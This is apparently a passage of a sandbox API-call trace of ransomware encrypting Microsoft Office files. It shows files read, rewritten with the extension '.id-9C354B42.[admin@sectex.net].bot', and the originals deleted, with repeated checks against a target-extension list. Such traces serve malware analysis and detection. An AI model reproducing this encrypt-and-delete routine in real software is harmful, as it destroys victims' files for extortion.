	[0161.720] GetLastError () returned 0x0
	[0161.720] ReadFile (in: hFile=0x3b8, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x328, lpOverlapped=0x0) returned 1
	[0161.721] WriteFile (in: hFile=0x25c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x330, lpOverlapped=0x0) returned 1
	[0161.722] ReadFile (in: hFile=0x3b8, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.722] WriteFile (in: hFile=0x25c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0161.722] SetEndOfFile (hFile=0x25c) returned 1
	[0161.722] CloseHandle (hObject=0x25c) returned 1
	[0161.722] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.722] SetEndOfFile (hFile=0x3b8) returned 1
	[0161.724] CloseHandle (hObject=0x3b8) returned 1
	[0161.724] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RCLRPT.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.725] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RCLRPT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rclrpt.cfg")) returned 1
	[0161.725] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RCLRPT.CFG") returned 64
	[0161.725] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RCLRPT.CFG") returned 64
	[0161.725] lstrlenW (lpString=".doc") returned 4
	[0161.726] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0161.726] lstrlenW (lpString=".docx") returned 5
	[0161.726] lstrcmpiW (lpString1=".docx", lpString2="T.CFG") returned -1
	[0161.726] lstrlenW (lpString=".pdf") returned 4
	[0161.726] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0161.726] lstrlenW (lpString=".xls") returned 4
	[0161.726] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0161.726] lstrlenW (lpString=".xlsx") returned 5
	[0161.726] lstrcmpiW (lpString1=".xlsx", lpString2="T.CFG") returned -1
	[0161.726] lstrlenW (lpString=".ppt") returned 4
	[0161.726] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0161.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RCLRPT.CFG") returned 64
	[0161.726] lstrlenW (lpString=".zip") returned 4
	[0161.726] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0161.726] lstrlenW (lpString=".rar") returned 4
	[0161.726] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0161.726] lstrlenW (lpString=".bz2") returned 4
	[0161.726] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0161.726] lstrlenW (lpString=".7z") returned 3
	[0161.726] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0161.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RCLRPT.CFG") returned 64
	[0161.726] lstrlenW (lpString=".dbf") returned 4
	[0161.726] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0161.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RCLRPT.CFG") returned 64
	[0161.726] lstrlenW (lpString=".1cd") returned 4
	[0161.726] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0161.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RCLRPT.CFG") returned 64
	[0161.726] lstrlenW (lpString=".jpg") returned 4
	[0161.726] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0161.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RCLRPT.CFG") returned 64
	[0161.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RCLRPT.CFG") returned 64
	[0161.727] lstrlenW (lpString=".doc") returned 4
	[0161.727] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0161.727] lstrlenW (lpString=".docx") returned 5
	[0161.727] lstrcmpiW (lpString1=".docx", lpString2="T.CFG") returned -1
	[0161.727] lstrlenW (lpString=".pdf") returned 4
	[0161.727] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0161.727] lstrlenW (lpString=".xls") returned 4
	[0161.727] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0161.727] lstrlenW (lpString=".xlsx") returned 5
	[0161.727] lstrcmpiW (lpString1=".xlsx", lpString2="T.CFG") returned -1
	[0161.727] lstrlenW (lpString=".ppt") returned 4
	[0161.727] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0161.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RCLRPT.CFG") returned 64
	[0161.727] lstrlenW (lpString=".zip") returned 4
	[0161.727] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0161.727] lstrlenW (lpString=".rar") returned 4
	[0161.727] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0161.727] lstrlenW (lpString=".bz2") returned 4
	[0161.727] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0161.727] lstrlenW (lpString=".7z") returned 3
	[0161.727] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0161.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RCLRPT.CFG") returned 64
	[0161.727] lstrlenW (lpString=".dbf") returned 4
	[0161.727] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0161.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RCLRPT.CFG") returned 64
	[0161.727] lstrlenW (lpString=".1cd") returned 4
	[0161.727] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0161.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RCLRPT.CFG") returned 64
	[0161.727] lstrlenW (lpString=".jpg") returned 4
	[0161.727] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0161.728] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0161.728] lstrlenW (lpString="RECL.ICO") returned 8
	[0161.728] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\recl.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0161.728] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=1078) returned 1
	[0161.728] CloseHandle (hObject=0x3b8) returned 1
	[0161.728] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\recl.ico")) returned 0x20
	[0161.728] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\recl.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.729] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\recl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0161.729] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.729] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.729] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\recl.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0161.729] GetLastError () returned 0x0
	[0161.729] ReadFile (in: hFile=0x3b8, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x436, lpOverlapped=0x0) returned 1
	[0161.731] WriteFile (in: hFile=0x25c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x440, lpOverlapped=0x0) returned 1
	[0161.732] ReadFile (in: hFile=0x3b8, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.732] WriteFile (in: hFile=0x25c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0161.732] SetEndOfFile (hFile=0x25c) returned 1
	[0161.732] CloseHandle (hObject=0x25c) returned 1
	[0161.732] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.732] SetEndOfFile (hFile=0x3b8) returned 1
	[0161.734] CloseHandle (hObject=0x3b8) returned 1
	[0161.734] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.735] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\recl.ico")) returned 1
	[0161.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECL.ICO") returned 62
	[0161.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECL.ICO") returned 62
	[0161.735] lstrlenW (lpString=".doc") returned 4
	[0161.735] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.735] lstrlenW (lpString=".docx") returned 5
	[0161.735] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0161.735] lstrlenW (lpString=".pdf") returned 4
	[0161.736] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.736] lstrlenW (lpString=".xls") returned 4
	[0161.736] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.736] lstrlenW (lpString=".xlsx") returned 5
	[0161.736] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0161.736] lstrlenW (lpString=".ppt") returned 4
	[0161.736] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECL.ICO") returned 62
	[0161.736] lstrlenW (lpString=".zip") returned 4
	[0161.736] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.736] lstrlenW (lpString=".rar") returned 4
	[0161.736] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.736] lstrlenW (lpString=".bz2") returned 4
	[0161.736] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.736] lstrlenW (lpString=".7z") returned 3
	[0161.736] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECL.ICO") returned 62
	[0161.736] lstrlenW (lpString=".dbf") returned 4
	[0161.736] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECL.ICO") returned 62
	[0161.736] lstrlenW (lpString=".1cd") returned 4
	[0161.736] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECL.ICO") returned 62
	[0161.736] lstrlenW (lpString=".jpg") returned 4
	[0161.736] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECL.ICO") returned 62
	[0161.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECL.ICO") returned 62
	[0161.736] lstrlenW (lpString=".doc") returned 4
	[0161.736] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.736] lstrlenW (lpString=".docx") returned 5
	[0161.736] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0161.736] lstrlenW (lpString=".pdf") returned 4
	[0161.736] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.737] lstrlenW (lpString=".xls") returned 4
	[0161.737] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.737] lstrlenW (lpString=".xlsx") returned 5
	[0161.737] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0161.737] lstrlenW (lpString=".ppt") returned 4
	[0161.737] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.737] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECL.ICO") returned 62
	[0161.737] lstrlenW (lpString=".zip") returned 4
	[0161.737] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.737] lstrlenW (lpString=".rar") returned 4
	[0161.737] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.737] lstrlenW (lpString=".bz2") returned 4
	[0161.737] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.737] lstrlenW (lpString=".7z") returned 3
	[0161.737] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.737] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECL.ICO") returned 62
	[0161.737] lstrlenW (lpString=".dbf") returned 4
	[0161.737] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.737] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECL.ICO") returned 62
	[0161.737] lstrlenW (lpString=".1cd") returned 4
	[0161.737] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.737] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECL.ICO") returned 62
	[0161.737] lstrlenW (lpString=".jpg") returned 4
	[0161.737] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.737] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0161.737] lstrlenW (lpString="RECS.ICO") returned 8
	[0161.737] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\recs.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0162.909] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=2998) returned 1
	[0162.909] CloseHandle (hObject=0x3f0) returned 1
	[0162.909] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\recs.ico")) returned 0x20
	[0163.046] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\recs.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.047] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\recs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0163.047] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.047] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.047] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\recs.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0163.063] GetLastError () returned 0x0
	[0163.063] ReadFile (in: hFile=0x3d0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0163.174] WriteFile (in: hFile=0x388, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0163.175] ReadFile (in: hFile=0x3d0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.175] WriteFile (in: hFile=0x388, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0163.175] SetEndOfFile (hFile=0x388) returned 1
	[0163.496] CloseHandle (hObject=0x388) returned 1
	[0163.496] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.496] SetEndOfFile (hFile=0x3d0) returned 1
	[0163.960] CloseHandle (hObject=0x3d0) returned 1
	[0163.960] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.961] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\recs.ico")) returned 1
	[0163.961] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECS.ICO") returned 62
	[0163.961] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECS.ICO") returned 62
	[0163.961] lstrlenW (lpString=".doc") returned 4
	[0163.961] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0163.961] lstrlenW (lpString=".docx") returned 5
	[0163.962] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0163.962] lstrlenW (lpString=".pdf") returned 4
	[0163.962] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0163.962] lstrlenW (lpString=".xls") returned 4
	[0163.962] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0163.962] lstrlenW (lpString=".xlsx") returned 5
	[0163.962] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0163.962] lstrlenW (lpString=".ppt") returned 4
	[0163.962] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0163.962] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECS.ICO") returned 62
	[0163.962] lstrlenW (lpString=".zip") returned 4
	[0163.962] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0163.962] lstrlenW (lpString=".rar") returned 4
	[0163.962] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0163.962] lstrlenW (lpString=".bz2") returned 4
	[0163.962] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0163.962] lstrlenW (lpString=".7z") returned 3
	[0163.962] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0163.962] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECS.ICO") returned 62
	[0163.962] lstrlenW (lpString=".dbf") returned 4
	[0163.962] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0163.962] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECS.ICO") returned 62
	[0163.962] lstrlenW (lpString=".1cd") returned 4
	[0163.962] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0163.962] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECS.ICO") returned 62
	[0163.962] lstrlenW (lpString=".jpg") returned 4
	[0163.962] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0163.962] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECS.ICO") returned 62
	[0163.962] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECS.ICO") returned 62
	[0163.962] lstrlenW (lpString=".doc") returned 4
	[0163.962] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0163.962] lstrlenW (lpString=".docx") returned 5
	[0163.963] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0163.963] lstrlenW (lpString=".pdf") returned 4
	[0163.963] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0163.963] lstrlenW (lpString=".xls") returned 4
	[0163.963] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0163.963] lstrlenW (lpString=".xlsx") returned 5
	[0163.963] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0163.963] lstrlenW (lpString=".ppt") returned 4
	[0163.963] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0163.963] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECS.ICO") returned 62
	[0163.963] lstrlenW (lpString=".zip") returned 4
	[0163.963] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0163.963] lstrlenW (lpString=".rar") returned 4
	[0163.963] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0163.963] lstrlenW (lpString=".bz2") returned 4
	[0163.963] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0163.963] lstrlenW (lpString=".7z") returned 3
	[0163.963] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0163.963] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECS.ICO") returned 62
	[0163.963] lstrlenW (lpString=".dbf") returned 4
	[0163.963] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0163.963] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECS.ICO") returned 62
	[0163.963] lstrlenW (lpString=".1cd") returned 4
	[0163.963] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0163.963] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECS.ICO") returned 62
	[0163.963] lstrlenW (lpString=".jpg") returned 4
	[0163.963] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0163.964] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0163.964] lstrlenW (lpString="SCHDRESN.CFG") returned 12
	[0163.964] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESN.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdresn.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0163.964] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=835) returned 1
	[0163.964] CloseHandle (hObject=0x3d0) returned 1
	[0163.964] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESN.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdresn.cfg")) returned 0x20
	[0163.964] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESN.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdresn.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.964] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESN.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdresn.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0163.965] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.965] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESN.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdresn.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0163.966] GetLastError () returned 0x0
	[0163.966] ReadFile (in: hFile=0x3d0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x343, lpOverlapped=0x0) returned 1
